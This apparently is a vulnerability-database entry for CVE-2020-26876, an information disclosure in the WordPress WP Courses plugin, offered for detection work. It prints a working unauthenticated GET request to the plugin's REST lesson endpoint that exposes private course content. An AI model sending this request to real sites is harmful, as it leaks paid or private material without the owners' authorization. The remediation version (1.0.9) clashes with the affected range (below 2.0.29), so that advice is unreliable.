🔙 목록으로 돌아가기

CVE-2020-26876: WordPress WP Courses Plugin Information Disclosure

TitleWordPress WP Courses Plugin Information Disclosure
Authordwisiswant0
SeverityHigh
ImpactAn attacker can exploit this vulnerability to gain sensitive information about the WordPress WP Courses Plugin.
RemediationUpdate to the latest version of the WordPress WP Courses Plugin (1.0.9) to fix the information disclosure vulnerability.
CVSS Score7.5
EPSS Score0.80007
CVE IDCVE-2020-26876
CWE IDCWE-306
Tags cve cve2020 wordpress wp-plugin exposure edb wpcoursesplugin vkev vuln

🔍 Vulnerability Description

WordPress WP Courses Plugin < 2.0.29 contains a critical information disclosure which exposes private course videos and materials.

🌐 HTTP Request

GET /wp-json/wp/v2/lesson/1 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-26876.yaml

🦈 Packet Capture: ⬇️ Download cve-2020-26876.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A